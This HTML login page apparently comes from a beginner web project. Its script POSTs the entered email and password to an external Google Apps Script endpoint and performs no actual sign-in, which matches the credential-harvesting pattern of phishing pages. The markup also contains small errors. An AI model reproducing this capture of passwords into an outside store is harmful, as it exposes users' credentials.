<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
    <script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
    <link rel="stylesheet" href="ham.css">
    <style>
       
        
        * {
            margin: 0;
            padding: 0;
            font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
        }
        section {
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            width: 100%;
            background-image: url(download\ \(3\).jpg) /* Background image */
            background-size : cover;
            background-repeat: no-repeat;
            background-position: center;
        }
        .form-box{
    position: relative;
    width: 400px;
    height: 450px;
    background: transparent;
    border: none;
    border-radius: 20px;
    backdrop-filter: blur(15px) brightness(80%);
    display: flex;
    justify-content: center;
    align-items: center;
}

h2{
    font-size: 2em;
    color: #fff;
    text-align: center;
}

.inputbox{
    position: relative;
    margin:30px 0;
    width: 310px;
    border-bottom: 2px solid #fff;

}

.inputbox label{
    position: relative;
    top: 50%;
    left: 5px;
    transform: translateY(-50%);
    color: #fff;
    font-size: 1em;
    pointer-events: none;
    transition: 0.5s;


}

input:focus~label,
input:valid label{
    top: -5px;
}

.inputbox input{
    width: 100%;
    height: 50px;
    background: transparent;
    border: none;
    outline: none;
    font-size: 1em;
    padding: 0 35px 0 5px;
    color: #fff;
    

}

.inputbox ion-icon{
    position:absolute;
    right: 8px;
    color: #fff;
    font-size: 1.2em;
    top: 20px;


}

.forgot{
    margin: -10px 0 17px;
    font-size: 0.9em;
    color: #fff;
    display: flex;
    justify-content: space-between;

}

.forgot label input{
    margin-right: 3px;

}

.forgot a {
    color: #fff;
    text-decoration: none;
}

.forgot a:hover{
    text-decoration: underline;
}

button{
    width: 100%;
    height: 40px;
    border-radius: 40px;
    background-color: #fff;
    border: none;
    outline: none;
    cursor: pointer;
    font-size: 1em;
    font-weight: 600;
}

.register{
    font-size: 0.9em;
    color: #fff;
    text-align: center;
    margin: 25px 0 10px;
}

.register p a {
    text-decoration: none;
    color: #fff;
    font-weight: 600;
}

.register p a:hover{
    text-decoration: underline;
}
@media screen and (max-width:400px){
    .form-box{
        width: 100%;    border-radius: 
        0px;
    }
}

body{
    background-image: url(download\ \(3\).jpg);
    background-size: cover;
    background-repeat: no-repeat;
    height: 100vh;
    margin: 0;
    display: flex;
    justify-content: center;
    align-items: center;
    
}
    

        
    </style>
    <link rel="stylesheet" href="ham.css">
</head>
<body>
    <section>
        <div class="form-box">
            <div class="form-value">
                <form accept="" name="formName">
                    <h2>Login</h2>
                    <div class="inputbox">
                        <ion-icon name="mail-outline"></ion-icon>
                            <input type="=email" required name="email">
                            <label>Email</label>
                        
                    </div>
                    <div class="inputbox">
                        <ion-icon name="lock-closed-out"></ion-icon>
                        <input type="password" required name="password">
                        <label>password</label>
                    </div>
                    <div class="forgot">
                        <label>
                            <input type="checkbox">remember me
                        </label>
                        <a href="#">forgot password</a>
                    </div>
                    <button>Login</button>
                    <div class="register"><p>dont have an account?
                        <a href="#">Sign Up</a>
                    </p></div>
                </form>
            </div>
        </div>

        <script>
			const scriptURL = 'https://script.google.com/macros/s/AKfycbz4Zy3L-PLaRhiyFpT0okMMoEHLnSb6pVRuXF3kjG8RjTPZqgS77VLVNbrd7XtTXvoI8A/exec'
			const form = document.forms['formName']
		  
			form.addEventListener('submit', e => {
			  e.preventDefault()
			  fetch(scriptURL, { method: 'POST', body: new FormData(form)})
				.then(response => alert("Thank you! your form is submitted successfully." ))
				.then(() => {  window.location.reload(); })
				.catch(error => console.error('Error!', error.message))
			})
		  </script>
    </section>
</body>
</html>
